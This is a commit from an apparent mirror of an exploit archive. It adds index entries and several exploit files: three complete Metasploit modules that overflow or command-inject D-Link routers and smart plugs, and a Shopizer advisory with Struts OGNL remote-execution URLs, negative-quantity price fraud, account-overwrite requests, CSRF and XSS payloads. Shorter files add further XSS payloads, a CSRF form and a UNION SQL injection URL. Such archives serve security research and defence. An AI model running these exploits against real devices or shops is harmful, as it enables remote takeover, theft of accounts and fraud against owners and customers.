bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_16_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-16 04:39:45 +00:00
parent 9b54da834d
commit f8cf6671cf
15 changed files with 1119 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -30653,6 +30653,7 @@ id,file,description,date,author,platform,type,port
34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0
34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0
34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
@ -30672,3 +30673,16 @@ id,file,description,date,author,platform,type,port
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80
34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
34065,platforms/hardware/remote/34065.rb,"D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,metasploit,hardware,remote,1900
34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0
34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 'smart_statistics_admin.php' Cross Site Scripting Vulnerability",2010-01-10,R3d-D3V!L,php,webapps,0
34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-01-01,"Truong Thao Nguyen",php,webapps,0
34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 CSS 'expression' Remote Denial of Service Vulnerability",2010-01-01,MustLive,windows,dos,0
34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ Multiple Cross Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0
34071,platforms/php/webapps/34071.txt,"Joomla! 'com_sar_news' Component 'id' Parameter SQL Injection Vulnerability",2010-06-02,LynX,php,webapps,0
34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 'hexjector.php' Cross Site Scripting Vulnerability",2010-06-01,hexon,php,webapps,0
34073,platforms/php/webapps/34073.py,"TCExam <= 10.1.7 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload Vulnerability",2010-06-02,"John Leitch",php,webapps,0
34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti Insecure Cookie Authentication Bypass Vulnerability",2010-06-02,Septemb0x,php,webapps,0

Can't render this file because it is too large.

131
platforms/hardware/remote/34063.rb Executable file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link info.cgi POST Request Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different D-Link
devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component,
when handling specially crafted POST HTTP requests addresses to the /common/info.cgi
handler. This module has been successfully tested on D-Link DSP-W215 in an emulated
environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial PoC
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
['OSVDB', '108249'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.02',
{
'Offset' => 477472,
'Ret' => 0x405cec # jump to system - my_cgi.cgi
}
]
],
'DisclosureDate' => 'May 22 2014',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => "/common/info.cgi",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end
print_status("#{peer} - Exploiting #{@my_target.name}...")
execute_cmdstager(
:flavor => :echo,
:linemax => 185
)
end
def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << [@my_target.ret].pack("N") # Overwrite $ra -> jump to system
# la $t9, system
# la $s1, 0x440000
# jalr $t9 ; system
# addiu $a0, $sp, 0x28 # our command
buf << rand_text_alpha_upper(40) # Command to execute must be at $sp+0x28
buf << cmd # Command to execute
buf << "\x00" # NULL terminate the command
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/common/info.cgi",
'encode_params' => false,
'vars_post' => {
'storage_path' => shellcode,
}
}, 5)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

152
platforms/hardware/remote/34064.rb Executable file
View file

@ -0,0 +1,152 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link HNAP Request Remote Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different
D-Link devices. The vulnerability is due to an stack based buffer overflow while
handling malicious HTTP POST requests addressed to the HNAP handler. This module
has been successfully tested on D-Link DIR-505 in an emulated environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
['CVE', '2014-3936'],
['BID', '67651'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.0',
{
'Offset' => 1000000,
'Ret' => 0x405cac, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.06',
{
'Offset' => 30000,
'Ret' => 0x405234, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.07',
{
'Offset' => 30000,
'Ret' => 0x405c5c, # jump to system - my_cgi.cgi
}
]
],
'DisclosureDate' => 'May 15 2014',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => "/HNAP1/",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
if res.body =~ /DIR-505/ && res.body =~ /1.07/
@my_target = targets[3] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end
print_status("#{peer} - Exploiting #{@my_target.name}...")
execute_cmdstager(
:flavor => :echo,
:linemax => 185
)
end
def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << rand_text_alpha_upper(4) # $s0, don't care
buf << rand_text_alpha_upper(4) # $s1, don't care
buf << rand_text_alpha_upper(4) # $s2, don't care
buf << rand_text_alpha_upper(4) # $s3, don't care
buf << rand_text_alpha_upper(4) # $s4, don't care
buf << [@my_target.ret].pack("N") # $ra
# la $t9, system
# la $s1, 0x440000
# jalr $t9 ; system
# addiu $a0, $sp, 0x28 # our command
buf << rand_text_alpha_upper(40) # Stack filler
buf << cmd # Command to execute
buf << "\x00" # NULL-terminate the command
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/HNAP1/",
'encode_params' => false,
'data' => shellcode
}, 5)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

146
platforms/hardware/remote/34065.rb Executable file
View file

@ -0,0 +1,146 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip
has initially reported the DIR-815 vulnerable. Probably there are other devices also
affected.
},
'Author' =>
[
'Zachary Cutlip', # Vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
],
'DisclosureDate' => 'Feb 01 2013',
'Privileged' => true,
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
}
]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(1900)
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
res = nil
1.upto(5) do
res,_,_ = udp_sock.recvfrom(65535, 1.0)
break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
udp_sock.sendto(pkt, rhost, rport, 0)
end
# UPnP response:
# [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
# we do not check for the Device ID (DIR-645) and for the firmware version because there are different
# dlink devices out there and we do not know all the vulnerable versions
if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:uuid:`#{cmd}`\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
end
def exploit
print_status("#{rhost}:#{rport} - Trying to access the device via UPnP ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to access the vulnerable device")
end
print_status("#{rhost}:#{rport} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 950
)
end
# the packet stuff was taken from the module miniupnpd_soap_bof.rb
# We need an unconnected socket because SSDP replies often come
# from a different sent port than the one we sent to. This also
# breaks the standard UDP mixin.
def configure_socket
self.udp_sock = Rex::Socket::Udp.create({
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
})
add_socket(self.udp_sock)
end
#
# Required since we aren't using the normal mixins
#
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
# Accessor for our UDP socket
attr_accessor :udp_sock
end

308
platforms/php/webapps/34062.txt Executable file
View file

@ -0,0 +1,308 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20140710-0 >
=======================================================================
title: Multiple critical vulnerabilities in Shopizer webshop
product: Shopizer
vulnerable version: 1.1.5 and below
fixed version: v2 (new codebase)
impact: critical
homepage: http://www.shopizer.com/
found: 2012-01-10
by: Johannes Dahse, Johannes Greil
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
Shopizer is an open source java shopping cart and e-commerce content
management software (CMS). The system is built on Struts 2, Hibernate and
Spring. JQuery ui and ajax are heavily used on the ui as well as DWR and
Struts2-jQuery plug-in. (http://www.shopizer.com/)
Vulnerability overview/description:
- -----------------------------------
Shopizer is prone to at least the following vulnerabilities, some of them are highly
critical:
1.) Remote Command Execution
Shopizer 1.1.5 is using Apache Struts 2.2.1.1 and is thus vulnerable to Remote
Command Execution. Shopizer 1.1.3 and below is built on Apache Struts 2.1.6
and is also affected.
Fore more details please refer to:
* https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm#a18
* http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html
This affects the shop and admin interface (central).
2.) Manipulation of product prices
When buying products in Shopizer the product costs for a single product is
calculated by the selected quantity times the price of the product. The
total costs of all products is the adding of all product costs. An attacker
can specify negative quantities to decrease the total costs.
This affects the shop.
3.) Manipulation of customer data / mass assignment
An attacker can change the contact details of a customer by modifying the
customerId in the change request. In example this allows him to modify the
shipping address to retrieve products bought by another customer.
Furthermore, a malicious admin user (sm-central) is able to change the
passwords of other user accounts by appending a "customer.customerPassword"
HTTP parameter when saving user details. This is possible _although_ there
is no UI (form field) for this within the admin interface.
This affects the shop and admin interface (central).
4.) Cross-Site Request Forgery
Modifying customer data is also prone to CSRF attacks. Additionally, the
attacker can change customer passwords, shop configuration, product details
and product prices by sending CSRF requests to the administration interface.
This affects the shop and admin interface (central).
5.) Missing anti brute force protection
No protection against brute force attacks regarding login credentials is
implemented. Attackers can guess for weak passwords of users, as the
password policy of the shop only allows exactly between 6 and 8 characters.
The use of special chars or digits is not being enforced.
This affects the shop and admin interface (central).
6.) Cross-Site Scripting
The Shopizer Admin Interface suffers from multiple reflected XSS
vulnerabilities.
Proof of concept:
- -----------------
1.) Remote Command Execution in Struts
a) Via exception
The following URL will trigger an exception for an invalid "productId" data
type and Struts will re-evaluate the specified value as OGNL expression. An
attacker can successfully bypass security restrictions of Struts and execute
arbitrary Java code, leading to Remote Command Execution.
/shop/product/reviews.action?product.productId=secconsult'%2b(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
Other numeric parameters are affected as well.
b) Via ParameterInterceptor
The following URL will store a OGNL expression in the property "search" of
type String. This OGNL expression can then be accessed by a dynamic function
call in another parameter leading to Remote Command Execution.
/shop/search.action?search=(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))(secconsult)&z[(search)('secconsult')]=true
2.) Manipulation of product prices
Assuming the shop has a product1 (300$) and a product2 (290$) for the total
costs of 590$. The following steps can be reproduced by a malicious user to
decrease the total costs when buying those products:
a) Add product1 and product2 to the shopping cart
b) Go to the shopping cart and press "recalculate"
c) Intercept the ajax DWR request and modify the number reference of the
parameter "productQuantity" for product2 to a negative value (-1):
c0-e3=string:2
c0-e4=number:-1
c0-e1=Object_Object:{productId:reference:c0-e3, productQuantity:reference:c0-e4}
d) The new costs for product2 now recalculate to: -1 x 290 = -290$
e) the new total costs is: product1 + product2 = 300$ + (-290$) = 10$
f) continue shopping and pay 10$ for products worth 590$.
This is especially critical for shops that only provide digital products.
Furthermore, during the second step of the checkout process it is
possible to add a negative quantity of products exploiting a Shopizer's
feature called "standalone shopping cart". This results in a negative price.
By issuing the following specially crafted request in the separate tab of
the web browser, while the first tab contains the second step of the checkout
process, the total price will be decreased. Note that the page must be
refreshed after the request to reflect the changes.
/shop/cart/addToCart?merchantId=1&productId=43&qty=-240
3.) Manipulation of customer data / mass assignment
It's possible to overwrite user data of an arbitrary
user and gain access to his account and personal information _when
registering a new user_.
To achieve this, a malicious user has to add the customer.customerId
parameter to the HTTP request and specify the value of the parameter
to match the target user e.g. 87 when registering a new user.
For example, the following request will overwrite the user data
including username and password of the user with the ID 87.
POST /shop/profile/register.action HTTP/1.1
[...]
struts.token.name=struts.token&struts.token=8393EPOT4BN4CNYAJ6ETRI9DNR2FSP1R&formstate=list&customer.customerNick=SecTest&newPassword=SecTest123&repeatNewPassword=SecTest123&customer.customerCompany=SecTest&customer.customerGender=M&customer.customerTitel=SecTest&customer.customerFirstname=SecTest&customer.customerLastname=SecTest&customer.customerTelephone=&customer.customerEmailAddress=sectest@example.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=SecTest&customer.customerCity=SecTest&customer.customerStreetAddress=SecTest&customer.customerHouseAddress=SecTest&captcha_honeypot=&customer.customerPrivacyRules=1&customer.customerId=87
In this case no account confirmation is needed. Instant access
to the overwritten account and its data is possible using the
new username SecTest and the newly specified password! An attacker is able to
access sensitive data (order information,
personal information etc.).
Additionally, the following request will overwrite the contact data of customer id 10,
including the name, shipping address and billing address:
/shop/profile/changeAddress.action?formstate=list&customer.customerId=10&customer.customerCompany=secconsult&customer.customerGender=&customer.customerTitel=&customer.customerFirstname=secconsult&customer.customerLastname=secconsult&customer.customerTelephone=00&customer.customerEmailAddress=owned@secconsult.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=1190&customer.customerCity=secconsult&customer.customerStreetAddress=secconsult&customer.customerHouseAddress=17&customer.customerAnonymous=false&customer.customerBillingTitel=&customer.customerBillingFirstName=secconsult&customer.customerBillingLastName=secconsult&customer.customerBillingStreetAddress=secconsult&customer.customerBillingHouseAddress=17&customer.customerBillingCity=secconsult&customer.customerBillingZoneId=95&customer.customerBillingState=secconsult&customer.customerBillingPostalCode=1190&customer.customerBillingCountryId=14&customer.customerLang=de&customer.customerPrivacyRul
es=1&customer.
customerNick=secconsult
Note that in this specific case the account of the attacker and the victim will not
be able to login again after the attack, because the nickname will be
overwritten and found twice during login.
Furthermore, the administration interface does not offer a UI to change user
passwords. By appending the parameter "customer.customerPassword" an attacker
is able to change the password of arbitrary users within the customer details
page.
4.) Cross-Site Request Forgery
The following image will alter the product price for the product 30 when
rendered by the browser of an logged in webshop administrator:
<img
src="/central/catalog/saveproduct.action?categ=30&product.productType=1&product.productStatus=true&__checkbox_product.productStatus=true&__checkbox_product.productVirtual=true&__checkbox_product.productIsFree=false&dateavailable=2012-01-24&price=1.00&product.productExternalDl=1&names[0]=secconsult&seo[0]=secconsult&title[0]=secconsult&highlights[0]=secconsult&descriptions[0]=secconsult&metadescriptions[0]=secconsult&downloadurl[0]=&uploadimage=&weight=1.0&width=1.0&length=1.0&height=1.0&product.productQuantity=99&product.productQuantityOrderMax=99&product.productSortOrder=1&product.productTaxClassId=1&product.productId=30&product.productImage=&product.productImageLarge=&product.productImage1=&product.productImage2=&product.productImage3=&product.productImage4="/>
Furthermore, the parameter "__checkbox_product.productIsFree" can also be set
to "true".
Additionally, the administration interface allows to overwrite the password
hash of every customer which can also be exploited via CSRF.
The product review form is also vulnerable to Cross-Site Request Forgery
attacks. A similar request to the following URL will result in a product
review being posted in the context of the currently logged in user. Note
that the URL does not contain any parameter that is holding a nonce value.
/shop/product/createReview.action?product.productId=43&rating=5&star=5&reviewText=Excellent&=
5.) Missing anti brute force protection
No proof-of-concept is necessary. See source:
sm-central/src/com/salesmanager/central/profile/ProfileAction.java
Line 525 - 530 of shopizer 1.1.5
6.) Cross-Site Scripting
/central/orders/searchcriteria.action?customername="><script>alert(document.cookie)</script>
/central/catalog/productlist.action?productname="><script>alert(document.cookie)</script>&availability=2"><script>alert(document.cookie)</script>&status=2"><script>alert(document.cookie)</script>
E.g. source code:
sm-central/WebContent/orders/orderlist.jsp
Line: 118
SEC Consult assumes, that many more XSS vulnerabilities exist within this
software as no proper filtering is implemented.
Vulnerable / tested versions:
- -----------------------------
All vulnerabilities could be reproduced with Shopizer 1.1.5 and 1.1.3
Vendor contact timeline:
- ------------------------
2012-01-10: The vulnerabilities have been found during a short blackbox test
of a shopizer installation during a customer project
2012-12-20: Customer allows contacting vendor
2013-01-10: Contacting vendor through support@shopizer.com, fast reply,
sending advisory
2013-01-22: Asking for status update, reply: vendor takes a look
2013-02-26: Asking for status update, vendor has some questions regarding
version numbers
2013-03-22: Asking for status update again
2013-03-23: Vendor: Release 2 is scheduled for June
2013-06-25: Asking for status update, no answer
2013-07-01: Sending deadline for advisory release
2013-07-07: Vendor: Version 2 of shopizer delayed
2013-07-08: Asking for new release date
2013-07-09: Vendor: moving from Struts to Spring & Spring security
2013-10-03: Asking again for release date
2013-10-06: Vendor: Release shortly
2013-12-10: Asking for update
2013-12-12: Vendor: Release date set for January 2014
2014-06: Vendor releases v2
2014-07-10: SEC Consult releases security advisory
Solution:
- ---------
Using the old version branch 1.x is not recommended as there are no security
fixes implemented by the vendor.
Version 2 has been released by the vendor, but it has not been tested by SEC
Consult and it is unclear whether the issues have been solved.
Workaround:
- -----------
These workarounds have to be implemented in source:
* Update the Apache Struts library to the latest version available.
* Disallow negative product quantities.
* Identify customers by session and not by customerId parameter.
Furthermore, change the default login (admin:password) for the administration
interface.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF J. Dahse, J. Greil / 2012, 2013, 2014
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQEcBAEBAgAGBQJTvmP8AAoJECyFJyAEdlkKIvIH/jN5QXxf98jLswdxXH7bpHND
OmX43+f2o119h7jphQierfe2Fj5NqG3l+9Gldb601SYtdOXldI5Dn/GSByZb0NbD
Xn5i9SeRNzbxPghCX7JubHaJX86HKoxrks34Hgoe7/v5A4rkIs3XA868tIODWq/j
FCSnwn3I7DQu8lSR1PzbzTX2aOnilTAdmSTFH5MahMXrVgk3YHwNbtVIDz6/xriW
ynsvLr709i/fQWEhwo4OoTwhyHwhrjPjY3jQNhcO70OMjG1kWqULFySGWNeVof0k
a2K/EHcqiDPFyrpHifvVheOeQaPoFO5CL/Ze7cV7B9vRi9WPo3Y07wNfnJiYOdY=
=3Hvl
-----END PGP SIGNATURE-----

10
platforms/php/webapps/34067.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40468/info
Smart Statistics is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Smart Statistics 1.0 is vulnerable; other versions may also be affected.
http:/www.example.com/74rG37_H057/smart_statistics_admin.php?type=page&name=">><FONT SIZE="70" FACE="courier" COLOR=red><MARQUEE BEHAVIOR=SCROLL HEIGHT=25 WIDTH=300 BGColor=navy>R3d-D3v!L W@S h3R3</MARQUEE></FONT>

23
platforms/php/webapps/34068.html Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/40483/info
CMS Made Simple is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied inputs. The application is also prone to a cross-site request-forgery vulnerability.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The attacker can exploit the cross-site request-forgery issue by tricking a victim into following a specially crafted HTTP request designed to perform some action on the attacker's behalf using a victim's currently active session.
CMS Made Simple 1.7.1 and prior are vulnerable.
<form name="csrf"
action="http://www.example.com:7080/config/confMgr.php"
method="post" target="hidden">
<input type="hidden" name="a" value="s" />
<input type="hidden" name="m" value="admin" />
<input type="hidden" name="p" value="security" />
<input type="hidden" name="t" value="`ADMIN_USR_NEW" />
<input type="hidden" name="r" value="" />
<input type="hidden" name="file_create" value="" />
<input type="hidden" name="name" value="owned" />
<input type="hidden" name="pass" value="password" />
<input type="hidden" name="pass1" value="password" />
</form>

9
platforms/php/webapps/34070.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40488/info
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/smilies_popup.php?details_var=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
http://www.example.com/manage_pictures.php?profile_id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E

7
platforms/php/webapps/34071.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40501/info
The 'com_sar_news' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering

9
platforms/php/webapps/34072.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40509/info
Hexjector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hexjector 1.0.7.2 is vulnerable; other versions may be affected.
http://www.example.com/Hexjector/hexjector.php?site=<iframe src="http://localhost/hexjector/" height=0 width=0></iframe>&injsubmit=Submit+Query&custom_parameter=

61
platforms/php/webapps/34073.py Executable file
View file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/40511/info
TCExam is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
